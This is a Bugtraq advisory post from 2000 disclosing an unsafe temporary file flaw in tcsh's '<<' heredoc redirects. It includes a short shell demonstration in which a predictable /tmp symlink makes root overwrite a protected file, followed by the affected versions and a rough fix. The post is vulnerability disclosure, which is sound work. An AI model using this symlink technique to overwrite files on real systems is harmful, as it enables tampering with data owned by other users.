Bugtraq mailing list archives
tcsh: unsafe tempfile in << redirects
From: proton <proton () ENERGYMECH NET>
Date: Sun, 29 Oct 2000 04:43:35 +0000
PROBLEM: /tmp# echo 'hello world' > rootfile /tmp# chmod 600 rootfile /tmp# ln -s rootfile sh$$ /tmp# chown -h 666.666 sh$$ /tmp# ls -l rootfile sh$$ -rw------- 1 root root 12 Oct 29 03:55 rootfile lrwxrwxrwx 1 666 666 8 Oct 29 03:56 sh12660 -> rootfile /tmp# cat <<BAR ? FOO ? BAR FOO o world /tmp# ls -l rootfile sh$$ /bin/ls: sh12660: No such file or directory -rw------- 1 root root 12 Oct 29 03:56 rootfile /tmp# cat rootfile FOO o world /tmp# VULNERABLE VERSIONS: 6.07.02 (Astron) 1996-10-27 6.08.00 (Astron) 1998-10-02 6.09.00 (Astron) 1999-08-16 (latest) (no other versions tested) FIX: make sure root (and other sensitive user accounts) doesnt have any predictable jobs (cron, ~/.cshrc, ...) that uses tcsh AND `<<' redirects. patch the source somehow.. (available at ftp://ftp.astron.com/pub/tcsh/ ) /proton
Current thread:
- tcsh: unsafe tempfile in << redirects proton (Oct 30)